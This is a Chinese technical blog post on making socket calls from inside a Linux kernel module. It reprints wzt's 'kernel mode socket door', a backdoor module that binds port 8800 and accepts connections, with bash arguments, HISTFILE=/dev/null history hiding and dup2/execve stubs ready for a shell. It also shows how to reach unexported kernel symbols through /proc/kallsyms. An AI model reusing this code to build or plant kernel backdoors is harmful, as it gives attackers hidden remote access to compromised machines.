在内核态通过int 0x80调用系统内核函数,虽然方便但是效率比较低。可以尝试直接调用内核函数,在wzt的原文中直接调用 sys_bind,sys_socket 等函数的实现,
比如 sys_bind 函数
SYSCALL_DEFINE3(bind, int, fd, struct sockaddr __user *, umyaddr, int, addrlen) { struct socket *sock; struct sockaddr_storage address; int err, fput_needed; sock = sockfd_lookup_light(fd, &err, &fput_needed); if (sock) { err = move_addr_to_kernel(umyaddr, addrlen, (struct sockaddr *)&address); if (err >= 0) { err = security_socket_bind(sock, (struct sockaddr *)&address, addrlen); /// 检查是否权限允许,若允许则返回0 if (!err) err = sock->ops->bind(sock, (struct sockaddr *) &address, addrlen); /// inet_stream_ops -> bind = inet_bind. 成功返回0. } fput_light(sock->file, fput_needed); } return err; }
security_socket_bind sock->ops->bind
但是在内核中 调用 security_socket_bind 编译是会遇到warning:
WARNING: "security_socket_bind" [/home/sina/Debug/network/network-shell1/net.ko] undefined!并且在加载内核时会提示:
在内核模块中有 MODULE_LICENSE 语句。
察看内核发现没有对内核符号 security_socket_bind 调用 EXPORT_SYMBOL,在 /proc/kallsyms 发现也有这个符号:
对于这种情况何以使用函数指针,查找/proc/kallsyms 文件来找到相应的函数。这个在
http://blog.csdn.net/xsckernel/article/details/8159374
分析内核源码有EXPORT_SYMBOL的 内核符号:kernel_bind.
int kernel_bind(struct socket *sock, struct sockaddr *addr, int addrlen)
{
return sock->ops->bind(sock, addr, addrlen);
}
EXPORT_SYMBOL(kernel_bind);
源码如下:
/* * kenel mode socket door v0.1 * * by wzt http://www.xsec.org */ #include <linux/module.h> #include <linux/kernel.h> #include <linux/socket.h> #include <linux/net.h> #include <linux/in.h> #include <linux/fs.h> #include <linux/file.h> #include <linux/types.h> #include <linux/errno.h> #include <linux/string.h> #include <linux/unistd.h> #include <net/sock.h> #include <asm/uaccess.h> #include <asm/unistd.h> #include "syscalls.h" #define port 8800 #define LEN 256 #define SGID 0x489196ab #define HOME "/" static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL }; char *env[]={ "TERM=linux", "HOME=" HOME, "PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin" ":/usr/local/sbin", "HISTFILE=/dev/null", NULL }; static inline my_syscall2(int, dup2, int, oldfd, int, newfd); static inline my_syscall3(int, execve, const char *, filename,const char **, argv, const char **, envp); struct socket *sock_alloc(void); int sys_setuid(uid_t uid); asmlinkage ssize_t sys_read(unsigned int fd, char __user * buf, size_t count); int k_listen(void) { struct socket *sock,*newsock; struct sockaddr_in server; struct sockaddr client[128]; char address[128]; int sockfd, sockid, i,size = 0; int error = 0,len = sizeof(struct sockaddr); error = sock_create(AF_INET,SOCK_STREAM,0,&sock); if (error < 0) { printk("[-] socket_create failed: %d\n",error); sock_release(sock); return -1; } sockfd = sock_map_fd(sock,0); if (sockfd < 0) { printk("[-] sock_map_fd() failed.\n"); sock_release(sock); return -1; } for (i = 0; i < 8; i++) server.sin_zero[i] = 0; server.sin_family = PF_INET; server.sin_addr.s_addr = INADDR_ANY; server.sin_port = htons(port); error = kernel_bind(sock, (struct sockaddr *)&server,len); if(error < 0) { printk("error bind!\n"); sock_release(sock); return 0; } error = kernel_listen(sock, 5); if (error < 0) { printk("[-] unix_listen failed.\n"); sock_release(sock); return -1; } printk("[+] listen port %d ok.\n",port); kernel_accept(sock,&newsock,sock->file->f_flags); sockid = sock_map_fd(newsock,0); if (sockid < 0) { printk("[-] sock_map_fd() failed.\n"); sock_release(newsock); return -1; } //sys_read(sockid,&ch,1); return 1; out_release: sock_release(sock); sock_release(newsock); return 0; } int k_socket_init(void) { printk("[+] kernel socket test start.\n"); k_listen(); } void k_socket_exit(void) { printk("[+] kernel socket test over.\n"); } module_init(k_socket_init); module_exit(k_socket_exit); MODULE_LICENSE("Dual BSD/GPL"); MODULE_AUTHOR("wzt");
sys_read sys_write等函数可以通过查找 /proc/kallsyms 来找到地址。